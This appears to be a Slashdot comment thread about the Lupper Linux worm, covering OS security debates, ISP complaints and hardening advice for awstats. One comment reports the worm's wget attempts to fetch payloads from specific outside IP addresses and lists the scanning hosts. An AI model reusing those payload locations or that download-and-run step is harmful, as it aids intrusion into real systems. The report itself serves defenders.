PHP is neither secure nor insecure. Individual applications are secure or insecure. PHP allows insecure applications and doesn't particularly encourage secure applications, nor does it limit the capabilities of secure applications.
There are application environments that are inherently safe... that is, they implement a sandbox that fails closed. Individual applications may be insecure, but if the application's security fails the attacker does not gain any capabilities that can be used to launch further attacks on other systems or other users on the same system.
Thank you for a well reasoned counterargument. You don't find many of those on here :-)
Regards,
Steve
Yes the title is a troll. No, the point is not.
/. are somewhat (though not much) more helpful than McAfee's removal instructions, which are to upgrade my version of a Windows virus checker. But SD really does not have a better answer for the concerned admin on what he should be looking for to ensure his system is safe.
Linux (and open source in general) is always touted as better than closed-source because there is such a large community of geeks who know the stuff well, so anyone looking for information can tap into the community of geeks to get answers, instead of calling an idiot tech rep for $$/hour.
Except that communities of geeks are notoriously unapproachable, and their willingness to part with their geekily gained information is low. If the responses to this Slashdot article are any indication, geeks are more interested in belittling others (including other geeks) than actually providing useful information.
Albeit the geekish hordes of
BTW, Wordpress 1.5 is safe.
Terrorists can attack freedom, but only Congress can destroy it.
Security is independant of popularity.
There is nothing about popularity that makes a system more or less secure.No.No. FEWER banks are robbed because they have BETTER security.
In order to get down to ZERO banks robbed, you'd have to get to PERFECT security.Because their security is not perfect.Now you're confusing "risk" with "security".
The two are not the same.
Security != Popularity
Security != RiskRead "Attack Trees" by Bruce Schneier.
http://www.schneier.com/paper-attacktrees-ddj-ft.
Security is all about reducing the avenues of attack.
If a Linux box is 100% secure from digital attack via the Internet (no ports open), it is still vulnerable to someone breaking into your office and taking the box. Big fat hairy deal. But it is still safe from that worm.
It's not so easy to compare as that. Unless you consider an OS being widely deployed to be a security flaw -- in which case Linux is doomed to be as bad as Windows if it succeeds...
If an OS, let's call it X, is rare, worms can't spread quickly, just because they can't find instances to spread to. The effects of this are very non-linear, with the popular OS being at a very major disadvantage.
If X is rare, few felons will have the expertise to attack it.
If X is rare, few felons will have the motivation to attack it.
Conversely, if X is widespread, and hated among felons, it will be an attractive target.
If X is commonly business-critical, a great deal of publicity comes with each attack, and felons can get glory from the press and praise from their felonious peers.
The bottom line is that there are many factors beyond the security of an OS in how widespread a worm becomes. In addition to the issues I listed above, consider how quicly patches get pushed out, which depends both on OS support for security patch distribution and administrator attentiveness. Consider the bandwidth of the typical connection, the nature of the hole, how likely it is to be blocked by non-OS firewalls, etc. etc.
So I'm afraid the MS vs Linux security question isn't going to be settled at all by comparing this worm's spread to any other worm, nor even by comparing any large population of worms.
Sorry -- it would be nice if the world were so simple.
Internet Storm Center has information about new variant reported by TrendMicro:
u lt5.asp?VName=ELF_LUPPER.B&VSect=P
http://isc.sans.org/diary.php?storyid=829
and the description itself is at http://www.trendmicro.com/vinfo/virusencyclo/defa
Your analogy wasn't all that great, and definately is not solid. So more people visit an individual bank than an individual house. However, there is a LOT more houses than banks. In a given period of time a lot more people visit any house than any bank. And looking at those stastics, yes residences are robbed more frequently than a bank.
Looking at that same data, banks still get robbed a decent ammount despite there being a lot less of them than houses. This is probably because the reward is much greater. All that cash in one place gives a greater reward, and hence more people go for it. Having better security decreases how many people are willing to go for it, or are succesful, but it still happens.
In the most basic terms it's based on difficulty, reward, and risk. In the case of worms, the larger the set of possible vulnerable machines the greater the reward. If linux really is more difficult it helps, but as the reward gets bigger there's more incentive.
So please, stop trying to ignore variables in the equation. Reward is most definately part of it. If someone is trying to expand a botnet, then a greater number of pc's to infect is most definately an incentive. As such an incentive grows, of course more people are going to attempt it. Sure, better security raises the difficulty and can help decrease this, but it definately isn't the only part of the equation.
The reason why this worm exist is due to the wide deployment of Windows Desktops with this specific vulnerability. There just aren't many Linux Desktops out there to bother with them.
Call me a heretic, but this is roughly correct, with some caveats.
OSS systems tend to have patches availible faster, so the bugs that lead to worms _can_ be fixed. It's just not realisitc to expect that they will be _always_ fixed (or even _often_ fixed). There's also really nothing you can do about the "I love you" strain of worms other than user education.
my ISP blocks port 80 incoming....:-(
(Keeps my firewall logs short at least.)
Microsoft hasn't released an updated for IE on OS X since 6/16/2003. They only released that small upgrade from 5.2.1 because of an asinine amount of bugs in 5.2.1, including one that I found and reported. They made a big todo over 5.2.1 being their last Mac release. 2.5 years is more than long enough to consider that IE is no longer available as a Mac product. You can still pick up a Redhat release that supports Sparc (5.x). Does that mean that RH supports Sparcs? No, it doesn't.
I think the developers who left these vulnerabilities open should be financially responsible for the damage this may cause.
"Derp de derp."
i was scanned from 216.128.227.73 (19 hits) and 24.42.129.18 (14 hits).
first tries a wget fron 195.224.174.18/nikon, 2. one from 24.224.174.18/listen
both are down.
a third tries to get 62.101.193.244/lupii from 64.246.0.38, but it's down, too.
"listen" is also tried from 24.224.2.174/listen
more info on it here: http://isc.sans.org/diary.php?storyid=823
I have to agree with this. While I've never been exceptionally pleased with Comcast's service or support, it's been decent at least. Lately, however, my connection quality has been terrible. First off, I'm not even getting anywhere near the bandwidth I'm supposed to be getting (less than half). More frustrating however, is the fact that a significant portion of my packets seemingly disappear and it seems to come in waves. My connection will run fine for a few minutes and then all (or nearly all) of my traffic is lost for several seconds. Which effectively causes a disconnect in any online game, ssh sessions to be dropped, and file downloads/uploads to be choked up - frustrating to say the least. I did some speed tests just a little while ago:
(All numbers in kbps):
down / up
487 / 354
405 / 357
136 / 354
2601 / 356
3175 / 323
2665 / 362
The first three low numbers were so low because the speed test client was just sitting there waiting for packets to come in (apparently this was one of the trouble times). Not only that but, unless I'm mistaken, my connection is supposed to be 7Mbps (8? they like to claim they've upped their speeds so often it's hard to know) down and 768kbps up. Not even my best speed test is greater than half my supposed bandwidth. Anyone else with Comcast having problems like this? Given Comcast's competence level in the past it doesn't surprise me all the much, I'm just pissed that they're basically the only deal in town... too bad a T1 is too expensive for me at the moment.
Still a lot better than, "If you're running Windows you're fucked."
I notice that one of the listed vulnerabilities in awstats - definitely the fault of the administrator because not only is there a patched awstats version to address this well-documented vulnerability (check the project page at sourceforge), but you should also NOT make awstats publicly available. Lock it down so it can be accessed either only from your local/LAN IP range, or at least use http authentication (read up on .htaccess, man htpasswd/htpasswd2).
If you don't understand how to do either, I wouldn't say that you shouldn't be allowed near computers (everyone has to start from somewhere) but I will tell you that you need to RTFM. Yesterday.
Chances are that if you don't have the vulnerable apps locked down or patched already, you've already been rooted. Download/install rkhunter and chkrootkit and run them, keep them updated, set them up on cron jobs (man crontab), and actually read the reports daily - or at least the summaries.
The Christian Right is Neither (Christian nor right). See: Matthew 23, Matthew 25, Ezekiel 16:48-50
The problem with Mac OS X (Darwin) is that /tmp is not its own filesystem:
/etc/rc
# ls -l /
lrwxr-xr-x 1 root admin 11 Apr 25 2005 tmp@ -> private/tmp
It is just a dir that gets blown away every reboot from some commands in
Furthermore, if one were to try and use a RAM disk (man hdid), you can only create ones with a static # of sectors. In other words, Mac OS X has nothing like tmpfs.